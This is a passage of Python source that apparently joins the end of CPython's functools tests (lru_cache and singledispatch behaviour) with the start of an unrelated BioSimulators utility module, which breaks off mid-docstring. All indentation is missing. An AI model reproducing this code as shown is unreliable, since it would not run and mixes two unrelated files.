# This cause the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will only call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown-off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
# FIXME: The following will only work after PEP 560 is implemented.
return
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
if __name__ == '__main__':
unittest.main()
|
utils.py
|
from biosimulators_utils.log.data_model import CombineArchiveLog # noqa: F401
from biosimulators_utils.report.data_model import SedDocumentResults # noqa: F401
import functools
import importlib
import multiprocessing
import os
import sys
import time
import types # noqa: F401
import yaml
__all__ = [
'get_simulators',
'get_simulator_api',
'get_simulator_metadata',
'use_simulator_api_to_exec_sedml_docs_in_combine_archive',
'exec_in_subprocess',
]
@functools.lru_cache(maxsize=None)
def get_simulators():
""" Get the ids and APIs of the available simulation tools
Returns:
:obj:`list` of :obj:`dict`: list of the id and name of the module which implements the API for
each available simulation tool
"""
with open(os.path.join(os.path.dirname(__file__), 'simulators.yml'), 'r') as file:
return yaml.load(file, Loader=yaml.Loader)
def get_simulator_api(api, reload=False):
""" Get the BioSimulators API for a simulator
Args:
api (:obj:`str`): module which implements the API for the simulator
reload (:obj:`bool`, optional): whether to reload the API
Returns:
:obj:`types.ModuleType`
"""
module = importlib.import_module(api)
if reload:
importlib.reload(module)
return module
def get_simulator_metadata(id):
""" Get metadata about a simulator
Args:
id (:obj:`str`): BioSimulators id of the simulator
Returns:
:obj:`dict`: metadata about the simulator
"""
simulator = next(simulator for simulator in get_simulators() if simulator['id'] == id)
id = simulator['id']
name = simulator['name']
api_module = simulator['api']['module']
api = get_simulator_api(api_module)
version = api.get_simulator_version()
api_version = api.__version__
return {
'_type': 'Simulator',
'id': id,
'name': name,
'version': version,
'api': {
'_type': 'SimulatorApi',
'module': api_module,
'package': simulator['api']['package'],
'version': api_version,
},
'specs': 'https://api.biosimulators.org/simulators/{}/{}'.format(id, version),
}
def use_simulator_api_to_exec_sedml_docs_in_combine_archive(api_name, *args, **kwargs):
""" Execute the SED-ML tasks defined in a COMBINE/OMEX archive and save the outputs
Args:
api (:obj:`str`): module which implements the API for the simulator
*args (:obj:`list`): positional arguments to ``exec_sedml_docs_in_combine_archive``
